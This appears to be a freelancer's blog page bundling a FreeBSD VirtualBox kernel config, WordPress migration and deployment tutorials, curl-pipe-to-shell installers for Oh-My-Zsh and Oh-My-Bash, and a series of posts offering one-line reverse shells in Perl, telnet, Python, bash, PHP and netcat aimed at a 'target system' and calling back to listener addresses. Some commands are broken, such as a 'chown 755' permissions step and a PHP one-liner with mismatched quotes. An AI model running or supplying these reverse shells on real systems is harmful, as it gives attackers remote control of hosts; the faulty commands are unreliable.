About mootiny

Network and Systems Engineer F/OSS Contributor and Maintainer Gray Hat Freelancing Atlanta, GA +1.770.715.9153
If you would not be forgotten, as soon as you are dead and rotten, either write things worth reading or do the things worth writing.

The Best FreeBSD Kernel Config as a VirtualBox Guest

About our FreeBSD Kernel Config

This is what we, at Gray Hat Freelancing, use for a FreeBSD kernel configuration when FreeBSD is running on VirtualBox as a guest. This is one of the smallest possible FreeBSD kernel configurations. There’s a little more you could trim off, but not a lot.

smallest possible freebsd kernel config for virtualbox
the power to serve

It’s highly recommended that you run FreeBSD as a VirtualBox host. But, if you must run it as a guest, why have all the extra kernel modules, right? I’ll help you compile this FreeBSD kernel configuration in another post, as well.

If you were a regular visitor before, you’ll recognize this. This is the configuration I was using to build out a new version of BSDeviant. Sadly, that project was tabled for now. UnixPunx just doesn’t seem to want to breathe again. Oh well, moving on.

FreeBSD Kernel Configuration for VirtualBox Guests

cpu             HAMMER
ident VBOX

options SCHED_ULE # ULE scheduler
options PREEMPTION # Enable kernel thread preemption
options INET # InterNETworking
options INET6 # IPv6 communications protocols
options IPSEC # IP (v4/v6) security
options TCP_OFFLOAD # TCP offload
options SCTP # Stream Control Transmission Protocol
options FFS # Berkeley Fast Filesystem
options SOFTUPDATES # Enable FFS soft updates support
options UFS_ACL # Support for access control lists
options UFS_DIRHASH # Improve performance on big directories
options UFS_GJOURNAL # Enable gjournal-based UFS journaling
options QUOTA # Enable disk quotas for UFS
options NFSCL # Network Filesystem Client
options NFSD # Network Filesystem Server
options NFSLOCKD # Network Lock Manager
options NFS_ROOT # NFS usable as /, requires NFSCL
options CD9660 # ISO 9660 Filesystem
options PROCFS # Process filesystem (requires PSEUDOFS)
options PSEUDOFS # Pseudo-filesystem framework
options GEOM_PART_GPT # GUID Partition Tables.
options GEOM_LABEL # Provides labelization
options COMPAT_FREEBSD32 # Compatible with i386 binaries
options SYSVSHM # SYSV-style shared memory
options SYSVMSG # SYSV-style message queues
options SYSVSEM # SYSV-style semaphores
options _KPOSIX_PRIORITY_SCHEDULING # POSIX P1003_1B real-time extensions
options PRINTF_BUFR_SIZE=128 # Prevent printf output being interspersed.
options KBD_INSTALL_CDEV # install a CDEV entry in /dev
options HWPMC_HOOKS # Necessary kernel hooks for hwpmc(4)
options AUDIT # Security event auditing
options CAPABILITY_MODE # Capsicum capability mode
options CAPABILITIES # Capsicum capabilities
options MAC # TrustedBSD MAC Framework
options INCLUDE_CONFIG_FILE # Include this file in kernel
options RACCT # Resource accounting framework
options RACCT_DEFAULT_TO_DISABLED # Set kern.racct.enable=0 by default
options RCTL # Resource limits

# Make an SMP-capable kernel by default
options SMP # Symmetric MultiProcessor Kernel

# CPU frequency control
device cpufreq

# Bus support.
device acpi
options ACPI_DMAR
device pci
options PCI_IOV # PCI SR-IOV support

# ATA controllers
device ahci # AHCI-compatible SATA controllers
device ata # Legacy ATA/SATA controllers
options ATA_STATIC_ID # Static device numbering

# ATA/SCSI peripherals
device scbus # SCSI bus (required for ATA/SCSI)
device da # Direct Access (disks)
device cd # CD
device pass # Passthrough device (direct ATA/SCSI access)
device ses # Enclosure Services (SES and SAF-TE)
#device ctl # CAM Target Layer

# atkbdc0 controls both the keyboard and the PS/2 mouse
device atkbdc # AT keyboard controller
device atkbd # AT keyboard
device psm # PS/2 mouse

device kbdmux # keyboard multiplexer

device vga # VGA video card driver
options VESA # Add support for VESA BIOS Extensions (VBE)

device splash # Splash screen and screen saver support

# syscons is the default console driver, resembling an SCO console
device sc
options SC_PIXEL_MODE # add support for the raster text mode
# vt is the new video console driver
device vt
device vt_vga
device vt_efifb

device agp # support several AGP chipsets

# PCI Ethernet NICs.
device em # Intel PRO/1000 Gigabit Ethernet Family

# Pseudo devices.
device loop # Network loopback
device random # Entropy device
device rdrand_rng # Intel Bull Mountain RNG
device ether # Ethernet support
device vlan # 802.1Q VLAN support

# The `bpf' device enables the Berkeley Packet Filter.
# Be aware of the administrative consequences of enabling this!
# Note that 'bpf' is required for DHCP.
device bpf # Berkeley packet filter

# USB support
device uhci # UHCI PCI->USB interface
device ohci # OHCI PCI->USB interface
device ehci # EHCI PCI->USB interface (USB 2.0)
device xhci # XHCI PCI->USB interface (USB 3.0)
device usb # USB Bus (required)
device ukbd # Keyboard
device umass # Disks/Mass storage - Requires scbus and da
# VirtIO support
device virtio # Generic VirtIO bus (required)
device virtio_pci # VirtIO PCI device
device vtnet # VirtIO Ethernet device
device virtio_blk # VirtIO Block device
device virtio_scsi # VirtIO SCSI device
device virtio_balloon # VirtIO Memory Balloon device

# Netmap provides direct access to TX/RX rings on supported NICs
device netmap # netmap(4) support

# The crypto framework is required by IPSEC
device crypto # Required by IPSEC
2020-07-24T10:31:33-04:00April 16th, 2020|Categories: Engineering|Tags: |

One of the Best Ways to Migrate WordPress

I’m going to show you how easy it is to migrate WordPress using only the command line. It is just as simple as installing it, in the first place. If you followed the tutorial on deploying wordpress from terminal successfully, you’ll have no trouble with this one.

Migrate WordPress from the Terminal

To be honest, unless you’re using the kick ass wp-cli tool. I’ve found that it’s easiest, and fastest, to use the command line to migrate WordPress. There’s no fiddling about with random plugins that’ll clutter up your database and bother you otherwise. And, in the end, it’s really only a few commands.

All we need to do is make sure we have all of the files and the file structure intact, as well as the database. If you’re moving from one domain name to another, you may need to find and replace in the database, everywhere your origin domain exists with your destination domain. Or, you could just update the website’s settings with your destination domain prior to performing the migration.

We’ll touch on fixing the configuration, if you forgot to update your domain before the migration, at the end.

Zip and Grab the WordPress Files

Go ahead and SSH into the machine hosting WordPress that you plan to migrate and zip up the entirety of the wordpress directory.

ssh <source host>
cd /var/www/html
sudo zip -r wordpress-migration.zip *
sudo mv wordpress-migration ~
compress files into a zip archive for a wordpress migration
zip -r target-zip-file.zip $path

You’ll see a lot of spam fly by as zip recursively compresses all of the files in preparation for our WordPress migration. Finally, I move the zip archive back to my user directory, where all that’s left for that part is to change the ownership to my user and pull it down. But, we still need the database or we won’t have anything for users or content or anything that matters.

Saving the WordPress Database for Migration

sudo mysql_dump -u wp_db_user -p wp_database > wordpress-database-backup.sql
Password:
chown mootiny:mootiny wordpress-database-backup.sql
chown mootiny:mootiny wordpress-backup.zip
extracting a SQL database for a WordPress migration
mysqldump backs dat ass up

Migrating the WordPress Website to the New Host

Now migrate your files to your new host. In case you haven’t noticed, this is exactly how you’d perform disaster recovery on a WordPress website that’d been compromised or suffered a hardware failure or anything else catastrophic. As well, it’s not far from manually deploying WordPress from the terminal either.

migrating wordpress files to a new host using sftp
put’n those files where they belong

Go ahead and use SFTP (which comes bundled with OpenSSH) to connect to your new host and transfer your backup for restoration and recovery.

sftp <destination host>
put wordpress-database-backup.sql
put wordpress-backup.zip

Now we simply extract the WordPress files on their new host. Then we will fix the file permissions. Create an empty database, database user and restore the SQL database at it’s new home.

creating a mariadb database and user, then granting the user access to the database, while manually performing a wordpress migration using only the terminal
creating the wordpress database and user for a wordpress migration (from terminal)

Change directories to webroot (if that’s where you want WordPress to live). Extract the files and proceed to log into the SQL server.

cd /var/www/html
sudo unzip ~/wordpress-backup.zip

Next we connect to our MariaDB server and create a shell for our WordPress website to move into.

sudo mysql -u root -p
Password:
MySQL> create database wp_database;
MySQL> grant all privileges on wp_database.* to 'wp_db_user'@localhost identified by 'wp_db_password';
MySQL> flush privileges;
MySQL> quit;

Now that we have a skeleton in place, all we need to do is restore the SQL content by populating the database with a quick one-liner and fix the file permissions and we’re golden!

mysql -u wp_db_user -p wp_database < wordpress-database-backup.sql

Setting the Correct Permissions after our WordPress Migration

restoring the WordPress database to MariaDB server and fixing the file permissions for a wordpress migration
fixing file permissions
chown -R www-data:www-data /var/www/html
find /var/www/html -type d -exec chown 755 {} \;
find /var/www/html -type f -exec chown 644 {} \;

And you’re done, browse to your new host and login through the web interface, like normal. :)

migrating wordpress from the terminal is successful!
ta-da!
2020-07-24T10:31:57-04:00April 15th, 2020|Categories: Engineering|Tags: , , , |

A Perfect WordPress Deployment using the Terminal

How to Manually Perform a WordPress Deployment

I’m going to walk you through a WordPress deployment, using only the terminal. This is mostly because I need to put some content up here. And, once upon a time, this used to be one of my staple articles. Nothing has changed, really. But, I will reiterate the fact that you really should know how to do things manually, because you start plowing ahead and automating them.

Automation is good, it’s absolutely necessary, even. But, when things break, it’s best that you’re able to figure it out how it happened. And, the easiest way to obtain that information is, sadly, the hard way.

WordPress being so evolved.. Please do not expect a WordPress deploy to be something you can’t handle. Deploying WordPress is very straightforward. So, let’s get started.

virtual guest linux debian in a vagrant
Linux Debian 9 as a vagrant guest

LAMP: Linux, Apache, MySQL and PHP

WordPress runs very well on almost any web server. But, for the purposes of sticking to the documentation, we’re going to use Apache (not that I always stick to the documentation, mind you). You should familiarize yourself with a “LAMP” deployment anyway, it’s pretty much what powers the entire internet. Please note that MySQL is often replaced with either MariaDB or Percona Server. I won’t go into the differences here.

Go ahead and SSH into your web server, update your software repository and do a full system upgrade. There’s no reason to deploy LAMP without the latest patches. I’m using debian, so your commands may be slightly different for these types of things. Refer to your distributions handbook, if you need to.

sudo apt update
sudo apt dist-upgrade
sudo apt install apache2 mariadb-server php-fpm

Enable the Necessary Apache Modules

Hah! Before, that required us grabbing a whole lot more packages than it does these days. But, don’t worry! We will still need to go get various PHP libraries for our WordPress deploy to be successful (specifically, for it to interact with mariadb). Still, you don’t need to do anything else there on Debian, unless Apache was previously configured with libapache2-mod-php. Then go ahead and issue the following (unexplained):

sudo a2dismod php
sudo a2dismod mpm_prefork
sudo a2enconf php7.3-fpm (at time of writing, 7.3 was stable)
sudo a2enmod mpm_event fcgid cgi proxy_fcgi setenvif rewrite
using terminal to swap apache modules for a manual wordpress deploy
Configure Apache

There’s plenty of other Apache modules that are beneficial for WordPress, but we’re just doing a deploy right now.

Prepare MariaDB for Production

I’m pretty sure that we all knew MySQL shipped with insecure defaults for many years. So, I have no idea, why this tradition has carried through to MariaDB. But, it’s my opinion, that we should damn not be having to still do this bit here. But, set a root password for the SQL db. And, disable remote access. Run ‘mysql_secure_installation’, press Y to everything and set a password.

Install the Minimum PHP Requirements

As I just said about Apache, there’s also plenty of PHP libraries that will benefit WordPress, but they’re beyond the scope of this walk through. So, we’re only going to grab what WordPress requires to install without complaint, as well as what is required to return a green health check.

sudo apt install php-mysql php-gd php-bz2 php-curl php-zip php-xml php-gmp php-intl php-mbstring php-xmlrpc php-token-stream php-mcrypt
manual wordpress deploy, installing required php modules
install php modules

I, honestly, don’t know what to tell you about PHP modules. Depending on your linux distribution, your PHP package is going to come with different modules. There’s really no telling what was bundled with it and what wasn’t. If you’re on Debian, this will get WordPress up and running, at least. But, on others, the packages will be named differently anyway. So, try to reach this minimum.

WordPress Deployed from Terminal

On Debian, Apache’s default “webroot” is in /var/www/html . Your “webroot” may be in a different location. If you don’t know, check your Apache configuration. It should be located in /etc/apache2 or /etc/httpd – The filename would either be apache2.conf or httpd.conf

Anyway, back to manually WordPress deploying from the terminal. I’ll have to clean this up later. But, for now, I’ll just finish what I started. Jump on over to webroot, grab the latest version from wordpress.org and extract it. All that’s left after that is to create a user for “MySQL”, set permissions and run the installer.

cd /var/www/html
wget https://wordpress.org/latest.zip
unzip latest.zip
quite literally deploying wordpress into a folder, out of compressed zip file
extract wordpress

Note: this next part you can ignore. What I am doing is deleting my webroot and moving the folder wordpress extracted to in place of my webroot. If you extracted wordpress into ./html/ then you don’t need to do this.

rm -rf ./html/
mv ./wordpress/ ./html/

Create a MySQL Database, a MySQL User, Marry Them

Now we need to create a MySQL database. Create a MySQL user and grant it privileges to write to the database. Then, fix the file permissions and we’re done with the terminal (the website is technically up, a that point.

mysql -u root -p (perhaps prefix with sudo, if you're not root)
mysql> create database wordpress;
mysql> grant all privileges on wordpress.* to 'wordpress'@localhost identified by '[email protected]';
mysql> flush privileges;
mysql> quit
grant all privileges on WordPress Deploy to Deploy@WordPress identified by 'ASSWORD'
Identified by assword?!

Let’s set some privileges, first give the user that runs Apache ownership of the files. Then set the directories to read/write, read/write by Apache’s user and group. Finally, give the files read/write to Apache’s user and read/execute to everyone else (since php-fpm needs to read and run them).

Fix File Permissions and Be Done!

chown -R www-data:www-data /var/www/html
find /var/www/html -type d -exec chmod 755 {} ;
find /var/www/html -type f -exec chmod 644 {} ;

At this point, we really need to bust out our browser and complete the install, so we can prevent about a billion zombies from hammering away at our install script and owning the box (just log password attempts on WordPress for a week and you’ll see what I mean). So get your browser out and finish this bitch off! You’re done.

Good luck. Have fun! And, next map. If you’d like this handled for you, drop me a line at Gray Hat Freelancing!

wordpress initial configuration - final step of wordpress deployment
Porky Pig

FIN – Our Job Here is Done

There’s plenty more to do. Especially from a security standpoint. I can tell you right now, our file permissions are decent but not perfect. There’s optimizations that need to be made or your blog could become a zombie in a DDoS, etc.. But, those are for another article. For now, enjoy the WordPress deploy!

wordpress has been deployed - hello world
Hello World!
deploying wordpress - do the speak english in wordpress deployment?
Self-explanatory
wordpress database configuration - almost done with wordpress deployment
@ssword
2020-07-24T10:32:56-04:00April 10th, 2020|Categories: Engineering|Tags: , , , , , , , , |

Jeet Kune Crypto: Powerful Perl Reverse Shells

Let’s spawn a few perl reverse shells, in various environments. Why? Because Perl is that diverse.

 

Perl Reverse Shells

 

If you’re just getting into writing code, python comes heavily recommended. But, if code auditing is something you’re wanting to get into, jumping straight into perl might be more beneficial. And, yes, these are all built to be executed on a single line.

 

A linux reverse shell using /bin/sh

 

perl -e 'use Socket; $i="172.16.16.5"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S");open(STDOUT,">&S"); open(STDERR, ">&S"); exec("/bin/sh -i");};'

 

perl reverse shell connecting back to ncat
perl reverse shell connecting back
ncat listening for the perl reverse shell to connect
ncat listening and accepting

 

A Windows reverse shell using Perl

 

It’s actually not uncommon to find perl installed on Windows Servers

 

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr, "172.16.16.5:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);$_ while<>;'

 

Perl reverse shell without using /bin/sh

 

Perl is so versatile that we can do some amazing things with it. Watch us spawn a reverse shell without using a binary!

 

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr, "172.16.16.5:1234");STDIN->fdopen($c,r);$~->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

 

Feel free to comment, if you’ve got some more reverse shells. We do have moderation enabled, but we’re pretty lenient with the content here, at Gray Hat Freelancing.

2020-07-24T10:52:59-04:00April 6th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , , |

Jeet Kune Crypto: Telnet Reverse Shells are Devastating

Reverse shells communicate in plaintext, by default. Telnet isn’t often installed by default any more. But, if it does exist on your target system, here are two one liners you can use to spawn a reverse shell with telnet.

Telnet Reverse Shells are Easy

rm -rf /tmp/p; mknod /tmp/p p && telnet 172.16.16.1 1234 0/tmp/p
telnet reverse shells
ugh… telnet

Another Simple Telnet Connect-Back Shell

telnet 172.16.16.1 1234 | /bin/bash | telnet 172.16.16.1 1235

As usual, in these reverse shell scenarios, your IP is 172.16.16.1 and your port is 1234. Telnet should be piped through an encrypted tunnel, unless you don’t mind people snooping on you.

2020-07-13T17:39:58-04:00April 6th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , |

More One Line Reverse Shells

Jeet Kune Crypto: One Line Reverse Shells with Scripting Languages

Reverse shells are extremely useful for subverting firewalls or other security mechanisms that may block new opened ports. Often you’ll find hosts already have several scripting languages installed. We’re going to take advantage of the some of the most popular of those languages, to spawn a reverse shell.

In these scenarios, your listening IP is 172.16.16.1 and your listening port is 1234.

Python Reverse Shell:

This python one line reverse shell is kind of a trip. Trust me, nobody expects you to remember this one, off of the top of your head.

python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("172.16.16.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

BASH Reverse Shell:

This one is simple. Everyone expects you to remember something like this, off of the top of your head.

bash -i >& /dev/tcp/172.16.16.1/1234 0>&1

PHP Reverse Shell:

From terminal:

php -r '$sock=fsockopen("172.16.16.1",1234);exec("/bin/sh" -i <&3 >&3 2>&3");'

 

2020-07-13T17:31:40-04:00April 6th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: |

Jeet Kune Crypto

Kung Foo: Jeet Kune Crypto

Jeet Kun Crypto isn’t a real thing, just a term I’m applying a new section of one-liners that are strictly security related. In that sense, I mean to say they’re penetration test, or at least vulnerability discovery related. It’s a joke. A play on an old tendency to refer to skillfully written and security related code as “kung foo”.

2020-06-19T12:26:31-04:00April 5th, 2020|Categories: Errata|

Jeet Kune Crypto: netcat (reverse shells)

Jeet Kune Crypto: netcat (reverse shells)

One of the most useful TCP/IP tools, for network and systems engineers, is netcat. Netcat is commonly referred to as the “TCP/IP Swiss Army Knife”. It is often flagged as malware or a “potentially unwanted program” by anti-malware software.

While traditional backdoors wait for you to connect (which netcat can also do). Here are a few ways that you can use it as a “reverse shell”, or a backdoor that connects back to you:

Versions that support "-e":
Linux:
nc -e "/bin/sh" <target> <target port>
Windows:
nc -e "cmd.exe" <target> <target port>

If the version of netcat that you’re using does not support “-e”, you’ll want to create a network socket out of a file. You can “hack” up a network socket on linux, like so:

mkfifo /tmp/socket;cat /tmp/socket|/bin/sh -i 2>&1|nc <target> <target port> > /tmp/socket

If you’re using netcat to listen for the incoming connection, you’d prepare to receive this type of connection like so:

nc <host> <port>
or for a range of ports
nc <host> <starting port>-<ending port>
2020-06-19T12:24:43-04:00April 5th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , |

Oh-My-ZSH!

Oh-My-Zsh!

oh-my-zsh terminal screenshot
Oh-My-ZSH!

Oh My Zsh is a delightful, open source, community-driven framework for managing your Zsh configuration. It comes bundled with thousands of helpful functions, helpers, plugins, themes, and a few things that make you shout…

sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"

2020-06-19T12:21:29-04:00April 4th, 2020|Categories: One Liners|Tags: , |

Oh-My-BASH!

BASH (Bourne Again Shell) Logo

Oh-My-Bash!

 

Oh-My-BASH!

 

If you’ve heard about Oh-My-ZSH before, Oh-My-BASH is a similar project for the Bourne Again Shell.

 

Here’s a one-liner to install Oh-My-BASH:

sh -c "$(curl -fsSL https://raw.github.com/ohmybash/oh-my-bash/master/tools/install.sh)"

2021-10-09T00:20:54-04:00April 4th, 2020|Categories: One Liners|Tags: , , |
Go to Top